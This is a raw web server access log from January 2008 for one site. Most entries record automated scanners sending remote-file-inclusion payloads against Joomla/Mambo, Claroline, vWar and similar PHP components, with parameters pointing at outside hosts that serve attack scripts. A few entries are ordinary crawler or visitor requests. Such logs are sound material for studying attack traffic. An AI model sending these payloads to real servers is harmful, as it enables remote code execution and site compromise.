85.119.217.23 - - [13/Jan/2008:09:02:17 -0800] "GET /logs//?mosConfig_absolute_path=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 200 29972 "-" "libwww-perl/5.65" "www.dmulk.com"
203.87.96.4 - - [13/Jan/2008:09:02:26 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.87.96.4 - - [13/Jan/2008:09:02:26 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.87.96.4 - - [13/Jan/2008:09:02:26 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.87.96.4 - - [13/Jan/2008:09:02:26 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.162.162.251 - - [13/Jan/2008:09:02:43 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [13/Jan/2008:09:02:43 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [13/Jan/2008:09:02:43 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.70.232.156 - - [13/Jan/2008:09:03:27 -0800] "GET /logs/access_071229.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.70.232.156 - - [13/Jan/2008:09:03:27 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.70.232.156 - - [13/Jan/2008:09:03:27 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:09:04:21 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:09:04:22 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:09:04:22 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [13/Jan/2008:09:04:33 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.217.23 - - [13/Jan/2008:09:06:11 -0800] "GET /logs/access_071122.log//?mosConfig_absolute_path=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.216.11 - - [13/Jan/2008:09:07:30 -0800] "GET /logs/access_071229.log/modules/vwar/admin/admin.php?vwar_root=http://www.huerzeler-reisen.ch/cache/stats.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [13/Jan/2008:09:07:31 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.huerzeler-reisen.ch/cache/stats.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [13/Jan/2008:09:07:31 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.huerzeler-reisen.ch/cache/stats.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
12.162.162.251 - - [13/Jan/2008:09:07:51 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [13/Jan/2008:09:07:51 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [13/Jan/2008:09:07:51 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [13/Jan/2008:09:07:54 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [13/Jan/2008:09:07:55 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [13/Jan/2008:09:07:55 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [13/Jan/2008:09:07:55 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [13/Jan/2008:09:08:15 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.8.71 - - [13/Jan/2008:09:08:57 -0800] "GET /bikes/CreSTOC07/?N=D HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:09:10:34 -0800] "GET /logs/access_071229.log/vwar/admin/?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:09:10:40 -0800] "GET /vwar/admin/?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:09:10:40 -0800] "GET /logs/vwar/admin/?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.213.31 - - [13/Jan/2008:09:11:29 -0800] "GET /minamijewelry/source_images/kanji_poem.jpg HTTP/1.0" 200 453841 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.52.170.162 - - [13/Jan/2008:09:16:07 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.170.162 - - [13/Jan/2008:09:16:09 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.170.162 - - [13/Jan/2008:09:16:11 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:09:16:34 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:09:16:34 -0800] "GET /?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:09:16:35 -0800] "GET /logs/?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 200 29967 "-" "libwww-perl/5.803" "www.dmulk.com"
24.41.58.147 - - [13/Jan/2008:09:19:16 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 200 927196 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
24.41.58.147 - - [13/Jan/2008:09:19:16 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 200 913443 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
24.41.58.147 - - [13/Jan/2008:09:19:21 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 200 828304 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
24.41.58.147 - - [13/Jan/2008:09:19:21 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 200 842640 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
24.41.58.147 - - [13/Jan/2008:09:19:24 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 200 812848 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
74.6.20.227 - - [13/Jan/2008:09:20:10 -0800] "GET /logs/access_071201.log HTTP/1.0" 200 44753 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:22:05 -0800] "GET /logs/access_071224.log//modules/vwar/admin/admin.php?vwar_root=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:09:22:05 -0800] "GET /logs/access_071205.log/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:22:05 -0800] "GET /logs/access_071224.log//modules/vwar/admin/admin.php?vwar_root=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:22:06 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:22:06 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:22:06 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:22:06 -0800] "GET /logs/access_071224.log//modules/vwar/admin/admin.php?vwar_root=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:22:07 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:22:07 -0800] "GET /logs/access_071224.log//modules/vwar/admin/admin.php?vwar_root=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:22:07 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:22:07 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:22:08 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:22:08 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:09:24:09 -0800] "GET /logs/access_071205.log//?CONFIG_EXT[LIB_DIR]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.71 - - [13/Jan/2008:09:24:10 -0800] "GET /megumi/Necklace/ HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.125 - - [13/Jan/2008:09:25:29 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:09:34:14 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:09:34:15 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.252.231 - - [13/Jan/2008:09:34:18 -0800] "GET /logs/access_071225.log///oneadmin/config.php?path[docroot]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [13/Jan/2008:09:34:18 -0800] "GET ///oneadmin/config.php?path[docroot]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [13/Jan/2008:09:34:18 -0800] "GET /logs///oneadmin/config.php?path[docroot]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:09:36:25 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:09:36:27 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:39:35 -0800] "GET /logs/access_071212.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:39:35 -0800] "GET /logs/access_071212.log//modules/My_eGallery/public/displayCategory.php?basepath=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:39:36 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:39:36 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:39:36 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:39:37 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:39:38 -0800] "GET /logs/access_071212.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:39:38 -0800] "GET /logs/access_071212.log//modules/My_eGallery/public/displayCategory.php?basepath=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:39:38 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:39:39 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:39:39 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:09:39:40 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.217.23 - - [13/Jan/2008:09:43:01 -0800] "GET //?mosConfig_absolute_path=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 200 2962 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.188.10 - - [13/Jan/2008:09:43:48 -0800] "GET //tags.php?BBCodeFile=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
207.44.188.10 - - [13/Jan/2008:09:43:48 -0800] "GET /logs//tags.php?BBCodeFile=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
65.61.166.101 - - [13/Jan/2008:09:46:44 -0800] "GET /intern/admin/other/backup.php?admin=1&rootdir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
65.61.166.101 - - [13/Jan/2008:09:46:44 -0800] "GET /logs/intern/admin/other/backup.php?admin=1&rootdir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
65.61.166.101 - - [13/Jan/2008:09:46:49 -0800] "GET /intern/config/forum.php?rootdir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
65.61.166.101 - - [13/Jan/2008:09:46:50 -0800] "GET /logs/intern/config/forum.php?rootdir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:09:50:08 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:09:50:09 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:09:50:09 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.188.10 - - [13/Jan/2008:09:51:54 -0800] "GET /show.php?path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
207.44.188.10 - - [13/Jan/2008:09:51:54 -0800] "GET /logs/show.php?path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
63.90.125.203 - - [13/Jan/2008:09:52:28 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
63.90.125.203 - - [13/Jan/2008:09:52:28 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
83.201.28.140 - - [13/Jan/2008:09:55:59 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
62.75.234.144 - - [13/Jan/2008:09:57:42 -0800] "GET /logs/access_071226.log/tiny_includes/config.php?dir_ws=http://img85.imageshack.us/img85/880/zdxosju1.gif?& HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.234.144 - - [13/Jan/2008:09:57:42 -0800] "GET /tiny_includes/config.php?dir_ws=http://img85.imageshack.us/img85/880/zdxosju1.gif?& HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.234.144 - - [13/Jan/2008:09:57:43 -0800] "GET /logs/tiny_includes/config.php?dir_ws=http://img85.imageshack.us/img85/880/zdxosju1.gif?& HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.145 - - [13/Jan/2008:09:59:36 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.75.234.144 - - [13/Jan/2008:10:03:00 -0800] "GET /logs/access_071225.log/tiny_includes/config.php?dir_ws=http://img85.imageshack.us/img85/880/zdxosju1.gif?& HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
147.210.86.38 - - [13/Jan/2008:10:06:25 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
147.210.86.38 - - [13/Jan/2008:10:06:26 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
147.210.86.38 - - [13/Jan/2008:10:06:26 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.22 - - [13/Jan/2008:10:07:20 -0800] "GET /logs/access_070919.log HTTP/1.0" 200 35028 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.201.28.140 - - [13/Jan/2008:10:10:49 -0800] "GET /logs/access_071216.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
83.201.28.140 - - [13/Jan/2008:10:10:50 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
83.201.28.140 - - [13/Jan/2008:10:10:50 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:10:11:55 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.106.58 - - [13/Jan/2008:10:11:57 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.106.58 - - [13/Jan/2008:10:11:57 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.106.58 - - [13/Jan/2008:10:11:57 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.106.58 - - [13/Jan/2008:10:12:53 -0800] "GET /logs/access_071225.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.77.54 - - [13/Jan/2008:10:12:53 -0800] "GET /logs/access_071222.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://geocities.com/carneline0817/tools/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.77.54 - - [13/Jan/2008:10:12:54 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://geocities.com/carneline0817/tools/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
